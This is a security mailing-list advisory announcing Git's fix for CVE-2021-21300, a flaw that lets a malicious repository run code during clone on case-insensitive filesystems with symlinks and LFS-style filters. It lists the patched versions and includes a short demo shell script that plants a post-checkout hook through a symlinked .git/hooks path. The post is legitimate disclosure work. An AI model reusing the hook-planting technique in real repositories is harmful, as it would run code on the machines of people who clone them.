Openwall GNU/*/Linux
server OS
Linux Kernel Runtime Guard
John the Ripper
password cracker
Free & Open Source for any platform
in the cloud
Pro for Linux
Pro for macOS
Wordlists
for password cracking
passwdqc
policy enforcement
Free & Open Source for Unix
Pro for Windows (Active Directory)
yescrypt
KDF & password hashing
yespower
Proof-of-Work (PoW)
crypt_blowfish
password hashing
phpass
ditto in PHP
tcb
better password shadowing
Pluggable Authentication Modules
scanlogd
port scan detector
popa3d
tiny POP3 daemon
blists
web interface to mailing lists
msulogin
single user mode login
php_mt_seed
mt_rand() cracker
Services
Publications
Articles
Presentations
Resources
Mailing lists
Community wiki
Source code repositories (GitHub)
Source code repositories (CVSweb)
File archive & mirrors
How to verify digital signatures
OVE IDs
What's new
[<prev]
[next>]
[day]
[month]
[year]
[list]
Date: Tue, 9 Mar 2021 16:03:37 +0100 (CET)
From: Johannes Schindelin <[email protected]>
To: [email protected]
cc: [email protected], Matheus Tavares <[email protected]>
Subject: git: malicious repositories can execute remote code while cloning
Team,
The Git project released new versions on Tuesday, March 9th 2021
addressing CVE-2021-21300.
This vulnerability affects platforms with case-insensitive filesystems
with support for symbolic links, when certain clean/smudge filters are
configured globally (e.g. Git LFS).
The fixed versions are v2.17.6, v2.18.5, v2.19.6, v2.20.5, v2.21.4,
v2.22.5, v2.23.4, v2.24.4, v2.25.5, v2.26.3, v2.27.1, v2.28.1, v2.29.3,
and v2.30.2.
Link to the announcement:
https://lore.kernel.org/git/[email protected]/T/#u
We highly recommend to upgrade.
The addressed issue is:
* CVE-2021-21300:
On case-insensitive filesystems, with support for symbolic links,
if Git is configured globally to apply delay-capable clean/smudge
filters (such as Git LFS), Git could be fooled into running
remote code during a clone.
Demo exploit:
#!/bin/sh
git init delayed-checkout &&
cd delayed-checkout &&
echo "A/post-checkout filter=lfs diff=lfs merge=lfs" \
>.gitattributes &&
mkdir A &&
printf '#!/bin/sh\n\necho PWNED >&2\n' >A/post-checkout &&
chmod +x A/post-checkout &&
git add -A &&
rm -rf A &&
ln -s .git/hooks a &&
git add a &&
git commit -m initial
git clone delayed-checkout cloned
With Git LFS enabled globally, this will print "PWNED" during the clone
on case-insensitive file systems with support for symbolic links (such
as NTFS, HFS+, etc).
Credit for finding the vulnerability goes to Matheus Tavares who also
worked with me on fixing it.
Thanks,
Johannes
Powered by blists
-
more mailing lists
Please check out the
Open Source Software Security Wiki, which is counterpart to this
mailing list
.
Confused about
mailing lists
and their use?
Read about mailing lists on Wikipedia
and check out these
guidelines on proper formatting of your messages
.